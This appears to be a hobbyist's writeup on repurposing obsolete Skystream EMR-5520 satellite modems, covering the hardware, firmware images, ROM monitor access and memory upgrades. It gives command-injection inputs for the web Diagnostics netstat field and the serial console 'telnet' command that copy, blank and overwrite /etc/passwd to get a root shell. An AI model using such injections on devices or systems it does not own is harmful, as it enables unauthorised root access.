Skystream Networks EMR-5520S/40S Series (Edge Media Router) are satellite modems,
This box is EMR-5520 S202002P-R-EU-5

Skystream Networks was bought 2006 by Tandberg Television which was bought 2010 by Ericsson.

Hardware is MIL grade PowerPC 405GP (PVR: 40110145) 200MHz board having PC133 memory slot (128MB by default) and 2 PCI slots (PCI-X?).

Boot BIOS is based on openbios.

Operating system is Linux version 2.4.17. Contains BusyBox. No sources are available, and seems to be that none were released for customers (gpl@busybox.net).
Linux toolchain for this device has been "powerpc-hardhat-linux-gnu".

The device has serial line console which has specialized program on it, and web based management user interface. No shell level access at all.

This device is nowadays obsolete as satellite modem.

Some reasons why to invest time to this box:

• Bought ~25 boxes. inexpensive.
• MIL grade hardware, so it will work for years. Artesyn power supply.
• Uses 15W.
• PCI slots (2).
• Able to increase memory easily. inexpensively.
• Prefer rack mountable cases. Small 19" rack case. (22.5 cm deep without plastic bezel)
• No fans needed: quiet.

Intention to reuse this box in my projects

• PulseAudio server connecting to my A/V equipment.
  Streaming music from my library.
• GSF WebCam server video source (PCI card) if I get some old inexpensive Panasonic video cameras.
  This is a surveillance project in a remote location.
• Fine-tune my CLink system.
  CLink is a multistrategy data converter and formatter suitable for data logging.

root shell

Hacking is based on two components: (1) busybox is suid root, and (2) poorly implemented additional self-made utility programs like console command "shell" and web interfaces by Skystream.

To operating system level can be hacked through Web user interface Diagnostics part which contains netstat command parametering input field:

| dd if=/etc/passwd of=/ftp/passwd
ftp emr5500, get passwd passwd.new
mod root passwd
ftp emr5500, put passwd.new
| dd if=/ftp/passwd.new of=/etc/passwd
ssh emr5500 -l root
sh-2.03# 

Notice: the changed passwd file is in RAM filesystem, so reboot clears it.

Ok, you'll need to do it through console serial line? Here's it:

[xxxxxxxx@emr5500] telnet foo | cat /etc/passwd
root:CRYPT:...
...
[xxxxxxxx@emr5500] telnet foo |	cat /etc/passwd | sed 's%CRYPT%%' | dd of=/etc/passwd
0+1 records in
0+1 records out
[xxxxxxxx@emr5500] telnet foo | cat /etc/passwd
root::0:0:root:/:/bin/sh
...
[xxxxxxxx@emr5500] exit
SkyStream Networks
Edge Media Router
Please login as 'xxxxxxxx' for Command-Line Interface
emr5500 login: root
sh-2.03# 

rom monitor

Took a while to get in to rom monitor...

mtd4 has parameters for rom monitor, and has line:

Escape=escape;5;10

and the box says when booting:

Enter escape sequence within 5 seconds to access user interface.

and the correct answer was: write: escape
and the you'll end up having:

> help
Valid commands are:
      auto  Boot per boot environment variable settings
      boot  Boot specified image
 bootorder  Set boot order
      help  Display this list of commands
   helpenv  Display help for boot environment variables
      hinv  Display hardware inventory
   netboot  Perform a broadcast BOOTP operation
      ping  Ping test
  printenv  Display all boot environment variables
     reset  Reset the system
    setenv  Set a boot environment variable
   saveenv  Save the current boot environment variables
  unsetenv  Unset a boot environment variable
   version  Display boot version info
> version
EMR-5500 2.5 ROM Monitor (Nov  7 2002)
Golden Gate Version 0.02
compilation time: Nov  7 2002, 14:32:45
        checksum: 0x0112AEEE
> hinv
405 core,16K I/8K D,32K I/32K D
 Processor Version Register: 0x40110145
                  Processor: 200 MHz
        Processor Local Bus: 100 MHz
     On-Chip Peripheral Bus: 50 MHz
    External Peripheral Bus: 50 MHz

128 MB of SDRAM
Inventory of FLASH devices:
  Addr        MB Description
  0xFF000000  16   Boot FLASH (mfg=0xFF, dev=0xFF)

33 MHz PCI Bus
Internal PCI arbiter enabled
PCI devices:
  Bus Dev Vendor Device Class    Rev  Commnd Status
    0   1 0x100B 0x0020 0x020000 0x00 0x0006 0x0290 Network controller

Some minor modding for the box:

• More memory:
  

  Amount of SDRAM   = 256 MBytes 
  ...
  Memory: 248104k available (1652k kernel code, 2008k data, 196k init, 0k highmem)
  

  
  

  Amount of SDRAM   = 512 MBytes
  ...
  Memory: 505888k available (1652k kernel code, 2008k data, 196k init, 0k highmem)
  

  
  Eventhough machine's embedded Linux 2.4.17 does not work with larger memory.
• Linux 2.6.nn installation. Hopefully without JTAG.
• New front panel: get rid of the horrible plastic front panel and replace with a cool aluminium one.

mtd3 contains Linux installations i.e. kernel and filesystems.

mtd3 is built using mktree command (2 images (kludge)). hexdump mtd3:

00000000  00 52 50 4f 00 40 00 00  00 00 38 44 00 00 00 00  |.RPO.@....8D....|

00758000  00 52 50 4f 00 40 00 00  00 00 34 ac 00 00 00 00  |.RPO.@....4.....|

and Linux arch/powerpc/boot/mktree.c:

bt.bb_magic = htonl(0x0052504F);

Copied kernel and filesystem images using script:

# kernel 1
dd if=mtd3 skip=21376   bs=1 2>/dev/null | gzip -cd > mtd3.21376.uncompressed
# fs image 1
dd if=mtd3 skip=913440  bs=1 2>/dev/null | gzip -cd > mtd3.913440.uncompressed
# kernel 2
dd if=mtd3 skip=7721808 bs=1 2>/dev/null | gzip -cd > mtd3.7721808.uncompressed
# fs image 2
dd if=mtd3 skip=8667168 bs=1 2>/dev/null | gzip -cd > mtd3.8667168.uncompressed

Starting indexes may be found using "od -Ad -x mtd3" and searching gzip magic.

Main board

• IBM PowerPC 405GP (IBM25PPC405GP-3BE200C)
• SanDisk SDTNFAH-128 (16MB NAND flash)
• Xilinx XC9572XL (PLCC)
• Xilinx Spartan XC2S50 (5C)
• IDT 74LVC

Ethernet

• National Semiconductor DP83815DVNG
• LSI L80225/B
• Atmel 93C46A

Satellite receiver

• ST Microelectronics STV0299B
• Philips TDA8060
• Philips TSA5059T

EMR-5520S/40S Series Specifications (pdf) | Tandberg Television Skystream EMR5520S Edge Media Router - Clearance |
SanDisk SDTNFAH-512 (NAND) |